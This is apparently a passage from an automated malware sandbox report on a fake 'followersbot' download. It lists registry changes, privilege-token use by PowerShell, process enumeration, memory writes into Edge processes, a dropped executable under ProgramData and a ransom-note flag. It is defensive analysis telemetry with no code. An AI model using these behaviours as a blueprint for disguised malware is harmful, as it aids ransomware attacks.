Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\Explorer.EXE N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
N/A N/A C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskhostw.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeSecurityPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4660 wrote to memory of 4420 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 4420 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1620 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1620 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
